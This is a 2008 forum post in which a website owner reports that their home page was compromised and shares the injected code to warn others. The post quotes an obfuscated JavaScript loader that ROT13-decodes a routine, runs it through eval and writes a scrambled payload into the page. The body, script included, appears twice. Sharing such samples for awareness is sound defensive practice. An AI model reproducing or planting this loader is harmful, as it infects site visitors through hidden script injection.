Sageth
03-25-2008, 02:01 PM
Today, I was doing some maintenance that I've been putting off for a while and discovered that at the bottom of my page, I was seeing a few lines of garbage. A few Google searches later, I found that my home page was apparently 'hacked.' I didn't notice this until today and I'm on my site regularly. I also don't have any information in the logs, though I did notice that all of my index pages were scanned some time this month.
I've provided the code here for other people to be aware of. This is not a request for help or crying that Bluehost isn't protecting me, as I am fully aware of the risks and rewards of shared hosting (and the ever-evolving threats). I am in the process of checking all of my files and then I will be changing my passwords. If you have experience with web-based attacks, I would appreciate it as I am not as familiar with them as I probably should be. Fortunately, my site does not collect money, so the worst I could see happening is maybe some spam being sent out. Is there anything else I should be looking for?
Here's the code I found. I noticed that the second half of the script was visible, which makes me think it couldn't run.
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
The best place I've found so far to get information on it is http://www.pouet.net/topic.php?which=5006&page=1&x=22&y=11
I found other sites that look like they have more information, but I only know English and some French.
Just throwing this out here so other people can be aware of it as well. Mods, if you feel this is inappropriate or bad publicity, please feel free to lock or delete this thread.
I've provided the code here for other people to be aware of. This is not a request for help or crying that Bluehost isn't protecting me, as I am fully aware of the risks and rewards of shared hosting (and the ever-evolving threats). I am in the process of checking all of my files and then I will be changing my passwords. If you have experience with web-based attacks, I would appreciate it as I am not as familiar with them as I probably should be. Fortunately, my site does not collect money, so the worst I could see happening is maybe some spam being sent out. Is there anything else I should be looking for?
Here's the code I found. I noticed that the second half of the script was visible, which makes me think it couldn't run.
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
The best place I've found so far to get information on it is http://www.pouet.net/topic.php?which=5006&page=1&x=22&y=11
I found other sites that look like they have more information, but I only know English and some French.
Just throwing this out here so other people can be aware of it as well. Mods, if you feel this is inappropriate or bad publicity, please feel free to lock or delete this thread.